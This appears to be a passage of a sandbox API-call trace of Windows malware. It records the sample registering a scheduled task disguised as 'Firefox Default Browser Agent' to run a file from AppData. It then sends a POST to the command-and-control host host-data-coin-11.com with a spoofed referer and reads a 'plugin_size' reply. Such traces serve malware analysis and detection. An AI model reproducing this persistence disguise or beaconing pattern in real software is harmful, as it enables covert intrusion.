Flags=0x0, MemoryPointer=0x7f12a80) returned 0x30 [0105.280] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12a80) returned 1 [0105.280] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12a60) returned 0x14 [0105.280] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12a60) returned 1 [0105.280] IUnknown:Release (This=0x13bab0) returned 0x1 [0105.280] ITriggerCollection:Create (in: This=0x143cc0, Type=9, ppTrigger=0x7d6f9d0 | out: ppTrigger=0x7d6f9d0*=0x13be10) returned 0x0 [0105.389] IUnknown:QueryInterface (in: This=0x13be10, riid=0x3941020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x7d6f8a0 | out: ppvObject=0x7d6f8a0*=0x13be10) returned 0x0 [0105.389] ILogonTrigger:put_UserId (This=0x13be10, UserId="kEecfMwgj") returned 0x0 [0105.392] IUnknown:Release (This=0x13be10) returned 0x2 [0105.392] IUnknown:Release (This=0x13be10) returned 0x1 [0105.392] ITaskDefinition:get_Actions (in: This=0x12b900, ppActions=0x7d6f8d0 | out: ppActions=0x7d6f8d0*=0x10d7d0) returned 0x0 [0105.393] IActionCollection:Create (in: This=0x10d7d0, Type=0, ppAction=0x7d6f8e8 | out: ppAction=0x7d6f8e8*=0x143e90) returned 0x0 [0105.393] IUnknown:Release (This=0x10d7d0) returned 0x1 [0105.393] IUnknown:QueryInterface (in: This=0x143e90, riid=0x3941040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x7d6f8d8 | out: ppvObject=0x7d6f8d8*=0x143e90) returned 0x0 [0105.393] IExecAction:put_Path (This=0x143e90, Path="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 0x0 [0105.393] IUnknown:Release (This=0x143e90) returned 0x2 [0105.393] ITaskFolder:RegisterTaskDefinition (in: This=0x126130, Path="Firefox Default Browser Agent 4BCD659AD8F347B5", pDefinition=0x12b900, flags=6, UserId=0x7d6f900*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), password=0x7d6f940*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), LogonType=3, sddl=0x7d6f920*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), ppTask=0x7d6f8a0 | out: ppTask=0x7d6f8a0*=0x12daa0) returned 0x0 [0105.547] IUnknown:Release (This=0x143e90) returned 0x1 [0105.547] IUnknown:Release (This=0x143cc0) returned 0x1 [0105.547] TaskScheduler:IUnknown:Release (This=0x12b900) returned 0x0 [0105.547] TaskScheduler:IUnknown:Release (This=0x126130) returned 0x0 [0105.547] TaskScheduler:IUnknown:Release (This=0x10aab0) returned 0x0 [0105.547] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12940) returned 0x10d [0105.547] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12940) returned 1 [0105.548] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x418 [0105.548] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.548] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12720) returned 0x212 [0105.548] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12720) returned 1 [0105.548] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1484 [0105.548] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 0x1508 [0105.549] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x26) returned 0x7f12300 [0105.549] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3026b562 [0105.549] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x46) returned 0x7f12330 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39490312 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x738b4355 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32440e6f [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x692b816a [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc3e0613 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736a268 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b87d11b [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78b1bbc9 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbee51bf [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58487280 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46f0204c [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11cdb37b [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72a0a57f [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ae627dc [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d24c4c [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x506dc0bc [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b0fcf2e [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2faff2b6 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63eef08a [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20d60f93 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c0eb4d0 [0105.549] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x135179da [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ae7f2b7 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f1658d5 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x431a8c32 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x151887bc [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x378440d7 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe2b8eea [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24456e6d [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1193b33 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21f95e97 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x719fe80b [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a3f6e64 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a935c98 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6f20e447 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22813592 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11ff9f00 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16962a20 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fada6fa [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28414bbf [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23d54f1b [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4aa2ef30 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39490312 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x176a31d2 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40023a78 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69710980 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x653a17d9 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68df3947 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x160d54b5 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d47d107 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32bf9fd8 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c325bb1 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78a17cd7 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66acbe20 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66b79dca [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c8d9293 [0105.550] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c620549 [0105.551] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x199f79d6 [0105.551] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79331601 [0105.551] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x95) returned 0x7f12380 [0105.551] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0105.551] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0105.551] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0105.551] lstrcatA (in: lpString1="", lpString2="m\"`GHCqfvJK=\\JY)MgO+`;a:.[)\"=f@2&#od_q;cSJfym=CgfbN\"1r&OMLvWN" | out: lpString1="m\"`GHCqfvJK=\\JY)MgO+`;a:.[)\"=f@2&#od_q;cSJfym=CgfbN\"1r&OMLvWN") returned="m\"`GHCqfvJK=\\JY)MgO+`;a:.[)\"=f@2&#od_q;cSJfym=CgfbN\"1r&OMLvWN" [0105.551] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x7f12420 [0105.551] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0105.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x7f12420, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0105.551] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f7b8 | out: pProxyConfig=0x7d6f7b8) returned 1 [0105.572] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0105.666] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f870 | out: lpUrlComponents=0x7d6f870) returned 1 [0105.667] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f12540 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x7f12560 [0105.690] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71cad70 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x7f125d0 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x7f12630 [0105.690] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x176a31d2 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f12750 [0105.690] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x17) returned 0x7f12770 [0105.690] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7847bb47 [0105.690] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c06d1c1 [0105.690] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e212a27 [0105.690] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18c27088 [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40f1af91 [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x184c4808 [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7310768d [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5616705a [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c074df6 [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32c96eb4 [0105.691] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x436214a4 [0105.691] wsprintfW (in: param_1=0x7f12630, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://xubukpfubj.org/") returned 44 [0105.691] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12770) returned 0x17 [0105.691] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12770) returned 1 [0105.691] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12750) returned 0x12 [0105.691] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12750) returned 1 [0105.691] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f125d0) returned 0x4e [0105.691] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f125d0) returned 1 [0105.692] WinHttpAddRequestHeaders (hRequest=0x71cad70, pwszHeaders="Accept: */*\r\nReferer: http://xubukpfubj.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0105.692] WinHttpSendRequest (hRequest=0x71cad70, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f12380*, dwOptionalLength=0x8c, dwTotalLength=0x8c, dwContext=0x0) returned 1 [0107.126] WinHttpReceiveResponse (hRequest=0x71cad70, lpReserved=0x0) returned 1 [0107.127] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f12750 [0107.128] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f12750, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f12750*, lpdwNumberOfBytesRead=0x7d6f928*=0x18) returned 1 [0107.129] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f12750, Size=0x5000) returned 0x7f14f60 [0107.130] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f14f78, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f928 | out: lpBuffer=0x7f14f78*, lpdwNumberOfBytesRead=0x7d6f928*=0x0) returned 1 [0107.130] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3960000 [0107.132] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f14f60) returned 1 [0107.132] WinHttpCloseHandle (hInternet=0x71cad70) returned 1 [0107.132] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12630) returned 0x10d [0107.132] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12630) returned 1 [0107.132] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0107.132] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12560) returned 0x68 [0107.132] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12560) returned 1 [0107.132] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12540) returned 0x12 [0107.133] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12540) returned 1 [0107.133] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0107.133] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12420) returned 0x10c [0107.133] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12420) returned 1 [0107.133] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12330) returned 0x46 [0107.133] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12330) returned 1 [0107.133] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12380) returned 0x95 [0107.133] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12380) returned 1 [0107.134] lstrlenA (lpString="ä\x073|:|plugin_size=0") returned 19 [0107.134] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x15) returned 0x7f12330 [0107.134] lstrlenA (lpString="3|:|plugin_size=0") returned 17 [0107.134] lstrlenA (lpString="plugin_size") returned 11 [0107.134] atoi (_Str="0") returned 0 [0107.134] lstrlenA (lpString="3|:|plugin_size=0") returned 17 [0107.134] lstrlenA (lpString="|:|") returned 3 [0107.134] MapViewOfFile (hFileMappingObject=0x1508, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8090000 [0107.142] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0107.142] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8090000) returned 0x0 [0107.164] atoi (_Str="3") returned 3 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x462dd36b [0107.165] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xdf) returned 0x7f12350 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3026ad43 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63b8a8 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51d0c8b2 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d67ea10 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33a6999e [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66f7491d [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68d7a9c9 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d8f3455 [0107.165] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a53895 [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x54a4176a [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7356aa9a [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7310768d [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x293e4054 [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2abce0c [0107.243] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1670bb0b [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3bfdaaab [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51ec0134 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e2248f7 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d2047e [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6170cb32 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2611b632 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47e8e4df [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc765a44 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4e860910 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a8482e1 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24c6cc82 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb9ad8e1 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x330bce21 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d24c4c [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5dd95ac6 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c3ae426 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd77293 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23a3926c [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x793eafeb [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24c6cc82 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59fd8689 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62aecbe9 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51ff9819 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x477c846f [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78d79610 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71a11f34 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c1aeee [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25a0eef1 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70734bd7 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4369bb13 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6a8ca260 [0107.244] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f916546 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b006fd8 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23a3926c [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5527a5c6 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a4e2144 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1355ffa9 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79aff007 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d0c04ff [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d473ed9 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50f88db4 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b7366ce [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3228a705 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfdef887 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b0594e5 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b0594e5 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfb5a954 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e35b89c [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10c72234 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x224f120a [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x108eb0a9 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d9973ed [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ebec4c1 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c19de3d [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7071f1c0 [0107.245] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c810e35 